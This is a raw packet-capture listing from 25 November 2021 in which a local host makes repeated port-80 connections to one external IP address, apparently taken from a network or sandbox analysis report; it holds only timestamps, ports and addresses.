Nov 25, 2021 10:51:32.694257975 CET	80	50241	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.710422993 CET	80	50241	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.710472107 CET	80	50241	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:32.710701942 CET	50241	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.710752964 CET	50241	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:32.744002104 CET	80	50241	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.049814939 CET	50242	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.083276987 CET	80	50242	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.083556890 CET	50242	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.085055113 CET	50242	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.118359089 CET	80	50242	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.118539095 CET	50242	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.152056932 CET	80	50242	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.170150995 CET	80	50242	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.170216084 CET	80	50242	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.170363903 CET	50242	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.170424938 CET	50242	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.204001904 CET	80	50242	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.567312002 CET	50243	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.601381063 CET	80	50243	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.601617098 CET	50243	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.603281021 CET	50243	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.637258053 CET	80	50243	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.637440920 CET	50243	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.671575069 CET	80	50243	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.694824934 CET	80	50243	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.694880009 CET	80	50243	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:33.695153952 CET	50243	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.695238113 CET	50243	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:33.729556084 CET	80	50243	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.054603100 CET	50244	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.088675022 CET	80	50244	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.088982105 CET	50244	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.090456963 CET	50244	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.124454975 CET	80	50244	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.124661922 CET	50244	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.158648014 CET	80	50244	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.177088976 CET	80	50244	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.177141905 CET	80	50244	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.177320957 CET	50244	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.177385092 CET	50244	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.211713076 CET	80	50244	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.552050114 CET	50245	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.586150885 CET	80	50245	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.586395025 CET	50245	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.587918043 CET	50245	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.622314930 CET	80	50245	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.622495890 CET	50245	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.656570911 CET	80	50245	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.672346115 CET	80	50245	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.672396898 CET	80	50245	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:34.672624111 CET	50245	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.672674894 CET	50245	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:34.706887960 CET	80	50245	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.073745966 CET	50246	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.107831955 CET	80	50246	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.108088017 CET	50246	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.114156961 CET	50246	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.148163080 CET	80	50246	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.148386955 CET	50246	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.182445049 CET	80	50246	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.200263977 CET	80	50246	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.200318098 CET	80	50246	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.200689077 CET	50246	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.200742960 CET	50246	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.234791994 CET	80	50246	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.543978930 CET	50247	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.577061892 CET	80	50247	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.577253103 CET	50247	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.578963995 CET	50247	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.612026930 CET	80	50247	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.612226963 CET	50247	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.645325899 CET	80	50247	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.660902023 CET	80	50247	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.660932064 CET	80	50247	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:35.661063910 CET	50247	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.661091089 CET	50247	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:35.694461107 CET	80	50247	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.047116995 CET	50248	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.080636024 CET	80	50248	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.080951929 CET	50248	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.082510948 CET	50248	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.115895033 CET	80	50248	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.116099119 CET	50248	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.149677992 CET	80	50248	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.165667057 CET	80	50248	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.165719986 CET	80	50248	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.166078091 CET	50248	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.166130066 CET	50248	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.199599028 CET	80	50248	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.564635992 CET	50249	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.598697901 CET	80	50249	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.599001884 CET	50249	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.600595951 CET	50249	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.634573936 CET	80	50249	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.634820938 CET	50249	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.669011116 CET	80	50249	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.691555977 CET	80	50249	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.691611052 CET	80	50249	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:36.691890001 CET	50249	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.691973925 CET	50249	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:36.726155043 CET	80	50249	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.062232971 CET	50250	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.095618010 CET	80	50250	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.095921993 CET	50250	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.097490072 CET	50250	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.131022930 CET	80	50250	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.131242990 CET	50250	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.164786100 CET	80	50250	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.189821959 CET	80	50250	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.189887047 CET	80	50250	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.190037012 CET	50250	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.190099001 CET	50250	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.224054098 CET	80	50250	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.554083109 CET	50251	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.587537050 CET	80	50251	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.587799072 CET	50251	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.589318037 CET	50251	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.622852087 CET	80	50251	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.623034954 CET	50251	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.656543970 CET	80	50251	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.680969954 CET	80	50251	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.681032896 CET	80	50251	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:37.681207895 CET	50251	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.681276083 CET	50251	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:37.715013981 CET	80	50251	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.059248924 CET	50252	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.093085051 CET	80	50252	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.093331099 CET	50252	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.094882011 CET	50252	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.128668070 CET	80	50252	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.128961086 CET	50252	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.162920952 CET	80	50252	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.205209970 CET	80	50252	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.205271006 CET	80	50252	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.205631971 CET	50252	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.205684900 CET	50252	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.239662886 CET	80	50252	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.564495087 CET	50253	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.597713947 CET	80	50253	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.597861052 CET	50253	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.599425077 CET	50253	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.632504940 CET	80	50253	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.632685900 CET	50253	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.665806055 CET	80	50253	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.689625978 CET	80	50253	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.689646006 CET	80	50253	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:38.689876080 CET	50253	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.689893007 CET	50253	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:38.723012924 CET	80	50253	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.075324059 CET	50254	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.108586073 CET	80	50254	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.108800888 CET	50254	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.110251904 CET	50254	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.143323898 CET	80	50254	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.143500090 CET	50254	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.176630974 CET	80	50254	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.201595068 CET	80	50254	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.201642990 CET	80	50254	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.201868057 CET	50254	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.201916933 CET	50254	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.235295057 CET	80	50254	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.590748072 CET	50255	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.624782085 CET	80	50255	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.624972105 CET	50255	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.626538992 CET	50255	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.660557032 CET	80	50255	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.660751104 CET	50255	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.694823980 CET	80	50255	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.712763071 CET	80	50255	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.712811947 CET	80	50255	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:39.713057995 CET	50255	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.713105917 CET	50255	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:39.747375965 CET	80	50255	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.106406927 CET	50256	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.140644073 CET	80	50256	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.140796900 CET	50256	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.142401934 CET	50256	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.176500082 CET	80	50256	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.176708937 CET	50256	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.210688114 CET	80	50256	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.228552103 CET	80	50256	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.228631020 CET	80	50256	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.228789091 CET	50256	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.228835106 CET	50256	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.262748003 CET	80	50256	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.620887995 CET	50257	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.654304981 CET	80	50257	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.654525995 CET	50257	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.656007051 CET	50257	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.689354897 CET	80	50257	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.689590931 CET	50257	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.722925901 CET	80	50257	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.739022970 CET	80	50257	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.739073038 CET	80	50257	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:40.739250898 CET	50257	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.739300013 CET	50257	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:40.772744894 CET	80	50257	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.105618000 CET	50258	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.139677048 CET	80	50258	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.139906883 CET	50258	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.141474009 CET	50258	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.175520897 CET	80	50258	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.175769091 CET	50258	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.209820032 CET	80	50258	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.226566076 CET	80	50258	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.226615906 CET	80	50258	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.226923943 CET	50258	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.227068901 CET	50258	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.260885000 CET	80	50258	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.578533888 CET	50259	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.611753941 CET	80	50259	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.612025976 CET	50259	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.613563061 CET	50259	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.646925926 CET	80	50259	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.647212029 CET	50259	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.680596113 CET	80	50259	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.698240042 CET	80	50259	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.698288918 CET	80	50259	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:41.698436975 CET	50259	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.698487043 CET	50259	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:41.731909990 CET	80	50259	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.133702040 CET	50260	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.167146921 CET	80	50260	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.167440891 CET	50260	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.168917894 CET	50260	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.202254057 CET	80	50260	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.202502012 CET	50260	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.235934019 CET	80	50260	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.252224922 CET	80	50260	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.252274036 CET	80	50260	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.252502918 CET	50260	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.252552986 CET	50260	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.285975933 CET	80	50260	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.618027925 CET	50261	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.652148008 CET	80	50261	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.652414083 CET	50261	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.653882027 CET	50261	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.688033104 CET	80	50261	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.688277960 CET	50261	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.722631931 CET	80	50261	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.738009930 CET	80	50261	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.738044024 CET	80	50261	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:42.738290071 CET	50261	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.738322020 CET	50261	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:42.772629976 CET	80	50261	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.119230032 CET	50262	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.152479887 CET	80	50262	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.152652025 CET	50262	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.154211998 CET	50262	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.187385082 CET	80	50262	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.187589884 CET	50262	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.221050978 CET	80	50262	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.237607956 CET	80	50262	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.237673044 CET	80	50262	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.237987041 CET	50262	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.238082886 CET	50262	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.271768093 CET	80	50262	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.627271891 CET	50263	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.661333084 CET	80	50263	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.661534071 CET	50263	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.663132906 CET	50263	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.696985960 CET	80	50263	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.697297096 CET	50263	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.731070042 CET	80	50263	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.746808052 CET	80	50263	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.746856928 CET	80	50263	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:43.746978045 CET	50263	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.747015953 CET	50263	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:43.781677008 CET	80	50263	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.085896015 CET	50264	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.119684935 CET	80	50264	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.119838953 CET	50264	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.124896049 CET	50264	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.158745050 CET	80	50264	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.158967972 CET	50264	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.192869902 CET	80	50264	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.213745117 CET	80	50264	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.213785887 CET	80	50264	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.213920116 CET	50264	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.213968039 CET	50264	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.247813940 CET	80	50264	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.610042095 CET	50265	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.643517017 CET	80	50265	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.643651009 CET	50265	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.645262957 CET	50265	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.678643942 CET	80	50265	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.678891897 CET	50265	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.712285042 CET	80	50265	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.730153084 CET	80	50265	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.730201960 CET	80	50265	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:44.730343103 CET	50265	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.730392933 CET	50265	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:44.763791084 CET	80	50265	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.071264982 CET	50266	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.105129957 CET	80	50266	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.105381966 CET	50266	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.106868029 CET	50266	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.140757084 CET	80	50266	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.140907049 CET	50266	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.174909115 CET	80	50266	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.199707031 CET	80	50266	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.199736118 CET	80	50266	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.199927092 CET	50266	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.199954033 CET	50266	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.234090090 CET	80	50266	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.558928967 CET	50267	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.592330933 CET	80	50267	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.592595100 CET	50267	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.594588995 CET	50267	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.627928019 CET	80	50267	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.628153086 CET	50267	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.661456108 CET	80	50267	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.682820082 CET	80	50267	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.682874918 CET	80	50267	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:45.683016062 CET	50267	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.683069944 CET	50267	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:45.716659069 CET	80	50267	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.066456079 CET	50268	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.099884033 CET	80	50268	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.100208044 CET	50268	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.101808071 CET	50268	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.135417938 CET	80	50268	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.135593891 CET	50268	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.169121027 CET	80	50268	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.186052084 CET	80	50268	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.186121941 CET	80	50268	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.186420918 CET	50268	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.186521053 CET	50268	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.220078945 CET	80	50268	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.562216043 CET	50269	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.595952988 CET	80	50269	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.596120119 CET	50269	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.597645998 CET	50269	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.631407022 CET	80	50269	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.631548882 CET	50269	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:51:46.665224075 CET	80	50269	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.688225985 CET	80	50269	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.688239098 CET	80	50269	176.223.209.128	192.168.11.20
Nov 25, 2021 10:51:46.688450098 CET	50269	80	192.168.11.20	176.223.209.128
